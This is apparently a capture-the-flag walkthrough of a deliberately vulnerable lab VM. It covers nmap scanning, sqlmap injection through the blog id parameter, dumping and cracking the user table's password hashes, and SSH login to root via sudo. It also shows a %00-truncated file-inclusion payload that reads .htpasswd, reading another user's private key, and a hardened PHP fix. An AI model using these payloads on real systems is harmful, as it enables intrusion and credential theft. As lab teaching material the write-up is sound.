Information gathering
Nmap scan of the subnet
Before the target VM is powered on
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.132 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::20c:29ff:fe17:9209 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:17:92:09 txqueuelen 1000 (Ethernet)
RX packets 7 bytes 1105 (1.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 25 bytes 3296 (3.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 4 bytes 240 (240.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4 bytes 240 (240.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ nmap -sn 192.168.1.000/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-06 15:18 CST
Nmap scan report for 192.168.1.2
Host is up (0.00024s latency).
Nmap scan report for 192.168.1.132
Host is up (0.00012s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 4.81 seconds
After the target VM is powered on
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ nmap -sn 192.168.1.000/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-06 15:21 CST
Nmap scan report for 192.168.1.2
Host is up (0.00049s latency).
Nmap scan report for 192.168.1.132
Host is up (0.000019s latency).
Nmap scan report for 192.168.1.134
Host is up (0.00032s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 4.31 seconds
192.168.1.134 is the target host; the next step is to scan its services.
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ nmap -min-rate=10000 -p- 192.168.1.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-06 15:38 CST
Nmap scan report for 192.168.1.134
Host is up (0.00034s latency).
Not shown: 65512 filtered tcp ports (no-response), 19 filtered tcp ports (host-unreach)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
631/tcp closed ipp
Nmap done: 1 IP address (1 host up) scanned in 15.32 seconds
Port 80 deserves attention, and 631 is worth a look as well; there may be an admin panel or a login page.
Next, a service scan:
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ sudo nmap -sT -sV -O -p 22,25,80,631 192.168.1.134
[sudo] password for pixe1_p0ints:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-06 16:02 CST
Nmap scan report for 192.168.1.134
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp Sendmail 8.13.5/8.13.5
80/tcp open http Apache httpd 2.2.0 ((Fedora))
631/tcp closed ipp
MAC Address: 00:0C:29:28:D9:61 (VMware)
Device type: general purpose|proxy server|remote management|terminal server|switch|WAP
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (96%), SonicWALL embedded (93%), Control4 embedded (93%), Lantronix embedded (93%), SNR embedded (93%), Dell iDRAC 6 (92%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:sonicwall:aventail_ex-6000 cpe:/h:lantronix:slc_8 cpe:/h:snr:snr-s2960 cpe:/o:dell:idrac6_firmware cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel:4.1
Aggressive OS guesses: Linux 2.6.16 - 2.6.21 (96%), Linux 2.6.13 - 2.6.32 (95%), SonicWALL Aventail EX-6000 VPN appliance (93%), Control4 HC-300 home controller (93%), Lantronix SLC 8 terminal server (Linux 2.6) (93%), SNR SNR-S2960 switch (93%), Linux 2.6.8 - 2.6.30 (92%), Linux 2.6.9 - 2.6.18 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), Linux 2.6.18 - 2.6.32 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: ctf4.sas.upenn.edu; OS: Unix
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.73 seconds
Try a different protocol (UDP):
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ sudo nmap -sU -sV -O -p 22,25,80,631 192.168.1.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-06 16:03 CST
Nmap scan report for 192.168.1.134
Host is up (0.00022s latency).
PORT STATE SERVICE VERSION
22/udp filtered ssh
25/udp filtered smtp
80/udp filtered http
631/udp closed ipp
MAC Address: 00:0C:29:28:D9:61 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.47 seconds
Run nmap's built-in vuln scripts too; surprisingly many results came back.
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ nmap --script=vuln -p22,25,80,631 172.19.0.18
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-08 08:45 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 172.19.0.18
Host is up (0.00025s latency).
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-sql-injection:
| Possible sqli for queries:
| http://172.19.0.18:80/?title=Blog&id=5%27%20OR%20sqlspider&page=blog
| http://172.19.0.18:80/?title=Blog&id=6%27%20OR%20sqlspider&page=blog
| http://172.19.0.18:80/?title=Blog&id=7%27%20OR%20sqlspider&page=blog
|_ http://172.19.0.18:80/?title=Blog&id=2%27%20OR%20sqlspider&page=blog
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=172.19.0.18
| Found the following possible CSRF vulnerabilities:
|
| Path: http://172.19.0.18:80/
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/index.html?page=search&title=Search Results
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/index.html?page=blog&title=Blog
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/index.html?title=Home Page
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/index.html?page=contact&title=Contact
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/index.html?page=research&title=Research
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/?page=blog&title=Blog&id=5
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/?page=blog&title=Blog&id=6
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/?page=blog&title=Blog&id=7
| Form id:
| Form action: /index.html?page=search&title=Search Results
|
| Path: http://172.19.0.18:80/?page=blog&title=Blog&id=2
| Form id:
|_ Form action: /index.html?page=search&title=Search Results
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum:
| /admin/: Possible admin folder
| /admin/index.php: Possible admin folder
| /admin/login.php: Possible admin folder
| /admin/admin.php: Possible admin folder
| /robots.txt: Robots file
| /icons/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
| /images/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
| /inc/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
| /pages/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
| /restricted/: Potentially interesting folder (401 Authorization Required)
| /sql/: Potentially interesting directory w/ listing on 'apache/2.2.0 (fedora)'
|_ /usage/: Potentially interesting folder
631/tcp closed ipp
Nmap done: 1 IP address (1 host up) scanned in 171.35 seconds
Of the four ports, 631 is closed; of the three open ones, port 80 is still the most likely to have vulnerabilities.
Visit port 80.
The earlier scan result suggested a possible SQL injection:
http://172.19.0.18:80/?title=Blog&id=5%27%20OR%20sqlspider&page=blog
Exploitation
First, try to exploit the SQL injection.
The payload from the nmap script is not much use by itself, but it shows the injection point is the blog page, so just go there directly.
The id parameter should be the article number.
sqlmap's output is too long, so it is not pasted in full.
List the databases:
sqlmap -u 'http://172.19.0.18/index.html?page=blog&title=Blog&id=2%27%20or%201=1#' --dbs
Show the current database:
sqlmap -u 'http://172.19.0.18/index.html?page=blog&title=Blog&id=2%27%20or%201=1#' --current-db
current database: 'ehks'
List the tables:
sqlmap -u 'http://172.19.0.18/index.html?page=blog&title=Blog&id=2%27%20or%201=1#' -D ehks --tables
Database: ehks
[3 tables]
+---------+
| comment |
| user    |
| blog    |
+---------+
List the columns of the user table:
sqlmap -u 'http://172.19.0.18/index.html?page=blog&title=Blog&id=2%27%20or%201=1#' -D ehks -T user --columns
Database: ehks
Table: user
[3 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| user_id   | int(11)     |
| user_name | varchar(20) |
| user_pass | varchar(32) |
+-----------+-------------+
Dump the column values:
sqlmap -u 'http://172.19.0.18/index.html?page=blog&title=Blog&id=2%27%20or%201=1#' -D ehks -T user -C user_name,user_pass --dump
Database: ehks
Table: user
[6 entries]
+-----------+--------------------------------------------------+
| user_name | user_pass                                        |
+-----------+--------------------------------------------------+
| achen     | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf)    |
| ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1)       |
| jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978)       |
| pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite)      |
| sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 (pacman)        |
+-----------+--------------------------------------------------+
The passwords are all stored as MD5 hashes, but sqlmap can crack them on its own.
There is a login page under the /admin path, and these credentials very likely belong to it.
Every account can log in, but after logging in there is only a simple page with little content and nothing of value, so this is clearly not the right direction.
No other hints have turned up so far; recalling the SSH service found earlier, it is worth a try.
SSH configuration and connection
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ssh achen@172.19.0.18
Unable to negotiate with 172.19.0.18 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
An error. After looking it up online, it turns out the target's SSH version is too old; we need to manually enable the key exchange algorithms returned in the error message.
Here is a write-up of the fix:
https://zhuanlan.zhihu.com/p/30840210
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 achen@172.19.0.18
Unable to negotiate with 172.19.0.18 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
Another error, this time about the host key type.
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostkeyAlgorithms=+ssh-rsa achen@172.19.0.18
The authenticity of host '172.19.0.18 (172.19.0.18)' can't be established.
RSA key fingerprint is SHA256:NDWh6/414mOsW4P7K6ICc5R67PrX87ADMFUx9DK9ftk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.19.0.18' (RSA) to the list of known hosts.
BSD SSH 4.1
achen@172.19.0.18's password:
Keep adding options, enter the password, and the connection succeeds.
[achen@ctf4 ~]$ whoami
achen
[achen@ctf4 ~]$ sudo -l
User achen may run the following commands on this host:
(ALL) NOPASSWD: ALL
[achen@ctf4 ~]$
This account already has full privileges, so no privilege escalation is needed.
sudo /bin/bash
Compromise complete.
Reproducing the official walkthrough
The official document uses a file inclusion method, which is fairly novel compared with the SQL injection used by nearly every write-up online, so let's try it.
There are three php files under the /pages directory, and these three files correspond exactly to the menu bar at the top of the site's home page.
Switching pages on the site, the URL changes:
http://172.19.0.18/index.html?page=blog&title=Blog
The page parameter is the one that controls the file inclusion.
One can guess that the backend code is roughly:
<?php
// Guessed backend: the page parameter is concatenated into include() without any check
$page = $_GET['page'];
include($page . ".php");
?>
So the page parameter can be used for file inclusion.
Got stuck at the inclusion step: tried leaking SSH keys and reading the shadow file directly, but permissions were insufficient, so I turned to the document, which says that under the /restricted path in the current directory there is an .htpasswd file recording credentials.
htpasswd is an Apache component whose main job is HTTP authentication, but .htpasswd has no default path; this restricted path is most likely custom-defined.
No wonder everything other than the official document uses SQL injection.
172.19.0.18/index.html?page=../restricted/.htpasswd%00&title=Blog
Because the code appends .php to the page parameter, %00 is used here to truncate it.
Password cracking result: sorzek:pacman
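The hardened counterpart of the guessed backend, as an added example that is not the VM's own code: it closes both the id injection exploited with sqlmap above and the page inclusion truncated with %00. It assumes the page files under pages/ are named after the menu entries and that ehks has a blog table with id, title and body columns; neither is shown on the page.

```php
<?php
// Added example, not the VM's own code: a hardened version of the front
// controller the walkthrough guesses at. The page parameter is resolved
// through an allowlist instead of being concatenated into include(), and
// the blog id is type-checked and bound in a prepared statement.
// Assumed: files under pages/ named after the menu, and an ehks.blog table
// with id, title and body columns (only ehks.user was dumped on the page).

// 1. File inclusion: the parameter selects a key, never a path.
$allowedPages = [
    'home'     => 'pages/home.php',
    'blog'     => 'pages/blog.php',
    'search'   => 'pages/search.php',
    'contact'  => 'pages/contact.php',
    'research' => 'pages/research.php',
];
$pageKey = $_GET['page'] ?? 'home';
if (!is_string($pageKey) || !array_key_exists($pageKey, $allowedPages)) {
    http_response_code(404);          // "../restricted/.htpasswd%00" ends here
    exit('Unknown page');
}
$pageFile = $allowedPages[$pageKey];

// 2. SQL injection: reject anything that is not a positive integer, then bind it.
// filter_input() yields null when id is absent and false when it fails validation,
// so "2' or 1=1#" and "5' OR sqlspider" never reach the query.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($pageKey === 'blog' && $id === false) {
    http_response_code(400);
    exit('Bad blog id');
}

function loadBlogPost(PDO $pdo, int $id): ?array
{
    $stmt = $pdo->prepare('SELECT id, title, body FROM blog WHERE id = ?');
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = new PDO('mysql:host=localhost;dbname=ehks', 'webuser', 'CHANGE_ME_DB_PASSWORD', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // server-side prepared statements
]);
$post = ($pageKey === 'blog' && $id !== null) ? loadBlogPost($pdo, $id) : null;
include $pageFile;   // $post is available to pages/blog.php
```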
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostkeyAlgorithms=+ssh-rsa sorzek@172.19.0.18
BSD SSH 4.1
sorzek@172.19.0.18's password:
Last login: Mon Mar 9 15:28:09 2009 from 192.168.0.51
[sorzek@ctf4 ~]$
SSH connection successful.
[sorzek@ctf4 ~]$ sudo -l
Sorry, user sorzek may not run sudo on ctf4.
Still not root, so we need to escalate privileges by hand.
[sorzek@ctf4 home]$ cat /etc/passwd|grep achen
achen:x:501:501:Andrew Chen:/home/achen:/bin/bash
That gives us the target account's home directory.
SSH key theft
List all hidden files in the .ssh directory:
[sorzek@ctf4 home]$ ls -lah /home/achen/.ssh
total 40K
drwxr-xr-x 2 achen achen 4.0K Mar 9 2009 .
drwxr-xr-x 16 achen users 4.0K Mar 10 2009 ..
-rw-rw-r-- 1 achen achen 843 Mar 9 2009 achen_priv.ppk
-rw-rw-r-- 1 achen achen 294 Mar 9 2009 achen_pub.ppk
-rwx------ 1 achen achen 226 Mar 9 2009 authorized_keys
View the private key:
[sorzek@ctf4 home]$ cat /home/achen/.ssh/achen_priv.ppk
PuTTY-User-Key-File-2: ssh-rsa
Encryption: none
Comment: rsa-key-20090309
Public-Lines: 4
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ chmod 0700 achen_priv.key
┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ssh -i achen_priv.key -oKexAlgorithms=+diffie-hellman-group1-sha1 -oPubkeyAcceptedKeyTypes=+ssh-rsa -oHostkeyAlgorithms=+ssh-rsa achen@172.19.0.18
BSD SSH 4.1
Load key "achen_priv.key": Invalid key length
achen@172.19.0.18's password:
Because the SSH version is so old, and PuTTY no longer supports generating SSH-1 keys, producing a usable key would require other tools; that is too much hassle, and the principle is already basically clear, so I gave up.